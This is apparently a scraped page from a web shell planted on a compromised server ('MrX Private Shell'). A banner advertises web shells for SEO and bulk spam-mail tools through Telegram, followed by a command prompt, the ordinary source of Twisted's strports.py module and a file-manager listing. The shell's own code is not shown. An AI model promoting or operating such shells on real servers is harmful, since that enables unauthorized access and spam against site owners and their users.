__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
# -*- test-case-name: twisted.test.test_strports -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
Construct listening port services from a simple string description.

@see: L{twisted.internet.endpoints.serverFromString}
@see: L{twisted.internet.endpoints.clientFromString}
"""
from typing import Optional, cast

from twisted.application.internet import StreamServerEndpointService
from twisted.internet import endpoints, interfaces


def _getReactor() -> interfaces.IReactorCore:
    """
    Fetch the global reactor, typed as an L{interfaces.IReactorCore}.

    @rtype: L{twisted.internet.interfaces.IReactorCore}
    @return: the object importable as C{twisted.internet.reactor}.
    """
    # NOTE(review): the import is performed at call time rather than at module
    # import time - presumably so that importing this module does not itself
    # select/install a reactor; confirm against twisted.internet.reactor.
    from twisted.internet import reactor as globalReactor

    typedReactor = cast(interfaces.IReactorCore, globalReactor)
    return typedReactor


def service(
    description: str,
    factory: interfaces.IProtocolFactory,
    reactor: Optional[interfaces.IReactorCore] = None,
) -> StreamServerEndpointService:
    """
    Build a stream server service from a string endpoint description.

    @param description: The description of the listening port, in the syntax
        described by L{twisted.internet.endpoints.serverFromString}.
    @type description: C{str}

    @param factory: The protocol factory which will build protocols for
        connections to this service.
    @type factory: L{twisted.internet.interfaces.IProtocolFactory}

    @param reactor: The reactor handed to
        L{twisted.internet.endpoints.serverFromString} when the endpoint is
        constructed.  When L{None} (the default), the reactor returned by
        L{_getReactor} is used.
    @type reactor: L{twisted.internet.interfaces.IReactorCore} or L{None}

    @rtype: C{twisted.application.service.IService}
    @return: a L{StreamServerEndpointService} wrapping the endpoint parsed
        from C{description} and the given C{factory}.

    @see: L{twisted.internet.endpoints.serverFromString}
    """
    chosenReactor = _getReactor() if reactor is None else reactor
    endpoint = endpoints.serverFromString(chosenReactor, description)

    endpointService = StreamServerEndpointService(endpoint, factory)
    # NOTE(review): private flag on StreamServerEndpointService; presumably it
    # makes listen failures surface synchronously when the service is started
    # - confirm against twisted.application.internet.
    endpointService._raiseSynchronously = True
    return endpointService


def listen(
    description: str, factory: interfaces.IProtocolFactory
) -> interfaces.IListeningPort:
    """
    Start listening on the port described by a string, using the global
    reactor.

    @param description: The description of the listening port, in the syntax
        described by L{twisted.internet.endpoints.serverFromString}.
    @type description: L{str}

    @param factory: The protocol factory which will build protocols on
        connection.
    @type factory: L{twisted.internet.interfaces.IProtocolFactory}

    @rtype: L{twisted.internet.interfaces.IListeningPort}
    @return: whatever the reactor's matching C{listen*} method returns for
        the parsed description.

    @see: L{twisted.internet.endpoints.serverFromString}
    """
    from twisted.internet import reactor as globalReactor

    # The parser yields a method-name suffix plus the positional and keyword
    # arguments to pass to the reactor's "listen<suffix>" method.
    suffix, positional, keywords = endpoints._parseServer(description, factory)
    listenMethod = getattr(globalReactor, "listen" + suffix)
    port = listenMethod(*positional, **keywords)
    return cast(interfaces.IListeningPort, port)


# Names exported by ``from <this module> import *``; _getReactor is left out.
__all__ = ["service", "listen"]

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
newsfragments Folder 0755
runner Folder 0755
test Folder 0755
twist Folder 0755
__init__.py File 129 B 0644
app.py File 22.61 KB 0644
internet.py File 36.26 KB 0644
reactors.py File 2.28 KB 0644
service.py File 11.47 KB 0644
strports.py File 2.53 KB 0644
Filemanager